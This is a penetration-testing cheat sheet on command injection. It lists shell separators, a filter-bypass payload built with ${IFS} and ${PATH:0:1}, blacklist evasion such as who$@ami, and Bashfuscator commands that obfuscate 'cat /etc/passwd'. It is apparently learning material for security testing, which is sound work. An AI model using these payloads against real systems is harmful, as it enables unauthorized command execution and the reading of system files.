Command Injection

Basic Command Injection

;      # semi colon
\n     # New Line %0a
&      # background
|      # pipe
&&     # AND
||     # OR
``     # Sub Shell (backticks)
$()    # Sub-Shell

Advanced Command Injection

When Space,and paths(/etc/passwd, /, /home ) are not Allowed

# %0a is new line
# ls will list the file
# ${IFS} when space is blacklisted
# ${PATH:0:1} it will grab / from path variables

ip=127.0.0.150%0als${IFS}${PATH:0:1} 

# Final Command Becomes

127.0.0.1
ls /

Bypassing Blacklists(whoami,pwd,ls,cat)

who$@ami
w`h`o`a`mi  # should be even

Automated Obfuscation Tool for Command Injection

BashFuscator

GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.GitHub

we can use this tool to obfuscate our command

bashfuscator -c "cat /etc/passwd"

it will give very huge payload, to make it short we can use below command

bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

PreviousSQL Injection NextFile Upload Pentesting

Last updated 1 year ago